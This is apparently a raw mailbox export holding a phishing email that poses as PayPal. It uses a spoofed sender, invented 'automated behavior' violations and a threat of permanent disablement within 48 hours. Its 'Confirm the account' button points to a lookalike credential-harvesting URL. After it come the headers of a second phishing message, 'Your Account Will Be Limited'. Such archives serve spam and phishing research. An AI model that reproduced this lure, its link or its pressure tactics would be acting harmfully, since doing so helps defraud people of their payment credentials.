From: "PayPal Inc." <support@membercare.com>
Message-ID: <1220666c5e0fdd647d2f23e8f6c9b4e5@www.cds-profil.ch>
X-Mailer: Leaf PHPMailer 2.7 (leafmailer.pw)
MIME-Version: 1.0
Content-Type: text/html; charset=
Content-Transfer-Encoding: 8bit
Status: O
X-Status: 
X-Keywords:                  
X-UID: 543

<head></head><body><div id=":9u" class="ii gt adP adO"><div id=":9t" class="a3s aXjCH m15b922614f5d5462"><div><div class="m_-9070678874697320703pm-text"><div class="adM">
            </div><div><div style="font-family:Avenir,Helvetica,sans-serif;box-sizing:border-box;background-color:#f2f4f6;color:#74787e;height:100%;line-height:1.4;margin:0;width:100%!important"><div class="adM">




    
</div><table style="font-family:Avenir,Helvetica,sans-serif;box-sizing:border-box;background-color:#f5f8fa;margin:0;padding:0;width:100%" cellspacing="0" cellpadding="0" width="100%"><tbody><tr><td style="font-family:Avenir,Helvetica,sans-serif;box-sizing:border-box" align="center">
                <table style="font-family:Avenir,Helvetica,sans-serif;box-sizing:border-box;margin:0;padding:0;width:100%" cellspacing="0" cellpadding="0" width="100%"><tbody><tr><td style="font-family:Avenir,Helvetica,sans-serif;box-sizing:border-box;padding:25px 0;text-align:center">
        <span><blockquote class="m_-9070678874697320703tr_bq">
<span style="font-family:Verdana,sans-serif;font-size:x-large"><b><span style="color:#253b80">Pay</span><span style="color:#2997d8">Pal</span></b></span></blockquote>
</span>
    </td>
</tr><tr><td cellpadding="0" cellspacing="0" style="font-family:Avenir,Helvetica,sans-serif;box-sizing:border-box;background-color:#ffffff;border-bottom:1px solid #edeff2;border-top:1px solid #edeff2;margin:0;padding:0;width:100%" width="100%">
                            <table style="font-family:Avenir,Helvetica,sans-serif;box-sizing:border-box;background-color:#ffffff;margin:0 auto;padding:0;width:570px" cellspacing="0" cellpadding="0" align="center" width="570"><tbody><tr><td style="font-family: Avenir, Helvetica, sans-serif;box-sizing: border-box;padding: 35px">
                                        <p style="font-family: Avenir, Helvetica, sans-serif;box-sizing: border-box;color: #74787E;font-size: 16px;line-height: 1.5em;margin-top: 0;text-align: left">Dear customer, your account appears to have had an automated behavior that violates the <span style="color: #0070ba;"><a href="https://account.service.com.motionpro.fi/Iog/help/">Paypal Rules</a> .</span> <br> To unlock your account, please click the button below and confirm that you are the valid account owner.

</p>
<table style="font-family: Avenir, Helvetica, sans-serif;box-sizing: border-box;margin: 30px auto;padding: 0;text-align: center;width: 100%;-premailer-cellpadding: 0;-premailer-cellspacing: 0;-premailer-width: 100%" cellspacing="0" cellpadding="0" align="center" width="100%"><tbody><tr><td style="font-family: Avenir, Helvetica, sans-serif;box-sizing: border-box" align="center">
            <table style="font-family: Avenir, Helvetica, sans-serif;box-sizing: border-box" cellspacing="0" cellpadding="0" border="0" width="100%"><tbody><tr><td style="font-family: Avenir, Helvetica, sans-serif;box-sizing: border-box" align="center">
                        <table style="font-family: Avenir, Helvetica, sans-serif;box-sizing: border-box" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="font-family: Avenir, Helvetica, sans-serif;box-sizing: border-box">
                                    <a href="https://account.service.com.motionpro.fi/Iog/help/" target="_blank" style="font-family: Avenir, Helvetica, sans-serif;box-sizing: border-box;border-radius: 3px;box-shadow: 0 2px 3px rgba(0, 0, 0, 0.16);color: #FFF;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;background-color: #0070ba;border-top: 10px solid #0070ba;border-right: 18px solid #0070ba;border-bottom: 10px solid #0070ba;border-left: 18px solid #0070ba;" tabindex="-1" rel="external">Confirm the account</a>
                                </td>
                            </tr></tbody></table></td>
                </tr></tbody></table></td>
    </tr></tbody></table><p style="font-family: Avenir, Helvetica, sans-serif;box-sizing: border-box;color: #74787E;font-size: 16px;line-height: 1.5em;margin-top: 0;text-align: left">If you ignore this email your account will be Officially Permanently disabled the next 48 hours.. .
<br>
Best regards, <br>
Paypal </p>

                                        
                                    </td>
                                </tr></tbody></table></td>
                    </tr><tr><td style="font-family:Avenir,Helvetica,sans-serif;box-sizing:border-box">
        <table style="font-family:Avenir,Helvetica,sans-serif;box-sizing:border-box;margin:0 auto;padding:0;text-align:center;width:570px" cellspacing="0" cellpadding="0" align="center" width="570"><tbody><tr><td style="font-family:Avenir,Helvetica,sans-serif;box-sizing:border-box;padding:35px" align="center">
                    <p style="font-family:Avenir,Helvetica,sans-serif;box-sizing:border-box;line-height:1.5em;margin-top:0;color:#aeaeae;font-size:12px;text-align:center">Copyright 1999-2018 PayPal. All rights reserved.</p>
                </td>
            </tr></tbody></table></td>
</tr></tbody></table></td>
        </tr></tbody></table><div class="yj6qo"></div><div class="adL">
</div></div></div><div class="adL">          </div></div></div><div class="adL">

</div></div></div></body></html>


From jose@monkey.org Wed Aug  1 10:41:41 2018 +0000
Return-Path: ftpcienporcien@albergue-unix1c.sarenet.es
Delivered-To: jose@monkey.org
X-FDA: 74449006002.04.ray95_eb8629f0cc08
X-Spam-Summary: 1,0,0,,d41d8cd98f00b204,ftpcienporcien@albergue-unix1c.sarenet.es,:,RULES_HIT:2539:30001:30016:30054:30055:30067:30069:30070,0,RBL:194.30.0.118:@albergue-unix1c.sarenet.es:.lbl8.mailshell.net-62.18.11.100 64.10.201.10,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:1:0,LFtime:86,LUA_SUMMARY:none
X-HE-Tag: ray95_eb8629f0cc08
X-Filterd-Recvd-Size: 1740
Received: from albergue-unix1c.sarenet.es (albergue-unix1c.sarenet.es [194.30.0.118])
	by imf11.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed,  1 Aug 2018 10:41:41 +0000 (UTC)
Received: by albergue-unix1c.sarenet.es (Postfix, from userid 10360)
	id E93281EB4E; Wed,  1 Aug 2018 13:14:53 +0200 (CEST)
To: jose@monkey.org
Subject: Your Account Will Be Limited  !  =?UTF-8?Q?=E2=9C=94_?=
X-PHP-Originating-Script: 10360:r.php
